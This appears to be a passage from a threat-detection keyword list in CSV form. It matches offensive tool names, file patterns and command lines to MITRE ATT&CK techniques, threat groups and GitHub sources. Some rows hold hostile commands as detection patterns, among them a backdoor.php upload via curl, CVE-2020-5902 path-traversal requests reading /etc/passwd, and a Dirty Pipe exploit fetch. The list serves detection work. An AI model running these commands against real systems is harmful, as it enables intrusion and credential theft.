APT29,C2,https://github.com/RCStep/CSSG,1,1,N/A,10,10,554,107,2023-09-07T19:41:31Z,2021-01-12T14:39:06Z -*cs-token-vault.git*,offensive_tool_keyword,cobaltstrike,In-memory token vault BOF for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Henkru/cs-token-vault,1,1,N/A,10,10,128,25,2022-08-18T11:02:42Z,2022-07-29T17:50:10Z -*CT_Indirect_Syscalls.c*,offensive_tool_keyword,Indirect-Syscalls,Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls,1,1,N/A,N/A,1,67,10,2023-05-24T04:23:37Z,2023-05-23T06:30:54Z -*CT_Indirect_Syscalls.exe*,offensive_tool_keyword,Indirect-Syscalls,Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls,1,1,N/A,N/A,1,67,10,2023-05-24T04:23:37Z,2023-05-23T06:30:54Z -*CT_Indirect_Syscalls.sln*,offensive_tool_keyword,Indirect-Syscalls,Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls,1,1,N/A,N/A,1,67,10,2023-05-24T04:23:37Z,2023-05-23T06:30:54Z -*CT_Indirect_Syscalls.vcxproj*,offensive_tool_keyword,Indirect-Syscalls,Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls,1,1,N/A,N/A,1,67,10,2023-05-24T04:23:37Z,2023-05-23T06:30:54Z -*ctfr.py*,offensive_tool_keyword,ctfr,Abusing Certificate Transparency logs for getting HTTPS websites subdomains.,T1593 - T1594 - T1595 - T1567,TA0007 - TA0009 - TA0010,N/A,N/A,Information Gathering,https://github.com/UnaPibaGeek/ctfr,1,0,N/A,N/A,10,1792,281,2022-05-03T12:59:37Z,2018-03-06T01:14:28Z -*ctftool*,offensive_tool_keyword,ctftool,This is ctftool. an interactive command line tool to experiment with CTF. a little-known protocol used on Windows to implement Text Services. This might be useful for studying Windows internals. debugging complex issues with Text Input Processors and analyzing Windows security.,T1547.001 - T1059 - T1057,TA0001 - TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/taviso/ctftool,1,0,N/A,N/A,10,1626,278,2021-09-17T21:02:25Z,2019-06-07T03:39:10Z -*cube0x0/LdapSignCheck*,offensive_tool_keyword,cobaltstrike,Beacon Object File & C# project to check LDAP signing,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cube0x0/LdapSignCheck,1,1,N/A,10,10,148,22,2022-10-25T13:36:43Z,2022-02-24T20:25:31Z -*cube0x0/MiniDump*,offensive_tool_keyword,onex,C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/cube0x0/MiniDump,1,1,N/A,N/A,3,263,48,2021-10-13T18:00:46Z,2021-08-14T12:26:16Z -*cuddlephish*stealer.js,offensive_tool_keyword,cuddlephish,Weaponized Browser-in-the-Middle (BitM) for Penetration Testers,T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001,TA0009 - TA0006,N/A,N/A,Sniffing & Spoofing,https://github.com/fkasler/cuddlephish,1,1,N/A,10,2,152,10,2023-09-06T12:25:08Z,2023-08-02T14:30:41Z -*cuddlephish-main*,offensive_tool_keyword,cuddlephish,Weaponized Browser-in-the-Middle (BitM) for Penetration Testers,T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001,TA0009 - TA0006,N/A,N/A,Sniffing & Spoofing,https://github.com/fkasler/cuddlephish,1,1,N/A,10,2,152,10,2023-09-06T12:25:08Z,2023-08-02T14:30:41Z -*curi0usJack*,offensive_tool_keyword,Github Username,github user hosting malicious code and exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/curi0usJack,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*curl * --upload-file backdoor.php -v*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*curl --connect-timeout 3.14 -s ifconfig.me*,offensive_tool_keyword,Synergy-httpx,A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically,T1021.002 - T1105 - T1090,TA0002 - TA0011 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/t3l3machus/Synergy-httpx,1,0,N/A,8,2,108,14,2023-09-09T10:38:38Z,2023-06-02T10:06:41Z -*curl http*/handling-form-submission-complete/rce.jsp*,offensive_tool_keyword,Spring4Shell,Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/reznok/Spring4Shell-POC,1,0,N/A,N/A,4,303,229,2022-08-04T18:26:18Z,2022-03-31T00:24:28Z -*curl https://api.hunter.io/v2/domain-search?domain=*,greyware_tool_keyword,Hunter.io,used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business,T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589,TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Information Gathering,https://hunter.io/,1,0,N/A,N/A,10,N/A,N/A,N/A,N/A -*curl https://api.hunter.io/v2/email-finder?domain=*,greyware_tool_keyword,Hunter.io,used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business,T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589,TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Information Gathering,https://hunter.io/,1,0,N/A,N/A,10,N/A,N/A,N/A,N/A -*curl https://api.hunter.io/v2/email-verifier?email=*,greyware_tool_keyword,Hunter.io,used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business,T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589,TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Information Gathering,https://hunter.io/,1,0,N/A,N/A,10,N/A,N/A,N/A,N/A -*curl --output *http*/tomcatwar.jsp?*,offensive_tool_keyword,SpringCore0day,SpringCore0day from share.vx-underground.org & some additional links,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/craig/SpringCore0day,1,0,N/A,N/A,4,394,187,2022-03-31T11:54:22Z,2022-03-30T15:50:28Z -*curl -sk 'https://*/tmui/login.jsp/.. /tmui/util/getTabSet.jsp?tabId=Vulnerable*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*curl -v -k 'https://*/tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/jas502n/CVE-2020-5902,1,0,N/A,N/A,4,377,112,2021-10-13T07:53:46Z,2020-07-05T16:38:32Z -*curl -v -k 'https://*/tmui/login.jsp/.. /tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/jas502n/CVE-2020-5902,1,0,N/A,N/A,4,377,112,2021-10-13T07:53:46Z,2020-07-05T16:38:32Z -*curl*.interact.sh*,offensive_tool_keyword,interactsh,Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C3,T1566.002 - T1566.001 - T1071 - T1102,TA0011 - TA0001,N/A,N/A,C2,https://github.com/projectdiscovery/interactsh,1,1,FP risk - legitimate service abused by attackers - move to admintools ?,10,10,2675,317,2023-10-02T08:20:04Z,2021-01-29T14:31:51Z -*curl*/tmp/exploit-dirty-pipe*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/carlosevieira/Dirty-Pipe,1,1,N/A,N/A,1,8,5,2022-03-07T21:01:15Z,2022-03-07T20:57:34Z -*curlshell.py*,offensive_tool_keyword,curlshell,reverse shell using curl,T1105 - T1059.004 - T1140,TA0011 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/irsl/curlshell,1,1,N/A,10,10,269,28,2023-09-29T08:31:47Z,2023-07-13T19:38:34Z -*cursed chrome,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*cursed cookies,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*custom_payload_generator.*,offensive_tool_keyword,cobaltstrike,Various Aggressor Scripts I've Created.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/offsecginger/AggressorScripts,1,1,N/A,10,10,141,31,2022-01-01T19:04:27Z,2018-11-30T03:14:45Z -*CustomKeyboardLayoutPersistence*,offensive_tool_keyword,cobaltstrike,Achieve execution using a custom keyboard layout,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence,1,1,N/A,10,10,156,30,2023-05-23T20:34:26Z,2022-03-13T17:43:29Z -*cut -d: -f1 /etc/passwd*,greyware_tool_keyword,cut,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*CVE-*.bash*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1543 - T1588 - T1211 - T1203,TA0008 - TA0009 - TA0010,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,1,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.bat*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.bin*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.c*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.com*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.cpp*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.exe*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1543 - T1588 - T1211 - T1203,TA0008 - TA0009 - TA0010,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,1,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.git*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.msi*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.pl*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.ps1*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1543 - T1588 - T1211 - T1203,TA0008 - TA0009 - TA0010,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,1,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.py*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1543 - T1588 - T1211 - T1203,TA0008 - TA0009 - TA0010,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,1,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.reg*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.run*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.sh*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.vb*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.vbe*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.vbs*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.vbscript*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE-*.zsh*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gottburgm/Exploits,1,0,N/A,N/A,2,184,113,2020-04-17T07:28:55Z,2017-10-13T10:19:55Z -*CVE*/exploit.sh*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*CVE_*_exploited.txt*,offensive_tool_keyword,POC,A Safer PoC for CVE-2022-22965 (Spring4Shell),T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/colincowie/Safer_PoC_CVE-2022-22965,1,1,N/A,N/A,1,45,7,2022-05-27T12:56:40Z,2022-03-31T16:58:56Z -*cve_2_MSF_exploit_Mapping*,offensive_tool_keyword,Xerror,fully automated pentesting tool,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Chudry/Xerror,1,1,N/A,N/A,5,458,106,2022-12-08T04:33:03Z,2019-08-16T21:20:52Z -*CVE_20*.dll*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*cve_2019_0708_bluekeep_fail*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cve_2019_0708_bluekeep_pass*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cve_2020_0796_smbghost.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cve-20.x64.dll*,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,1,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -*cve-20.x86.dll*,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 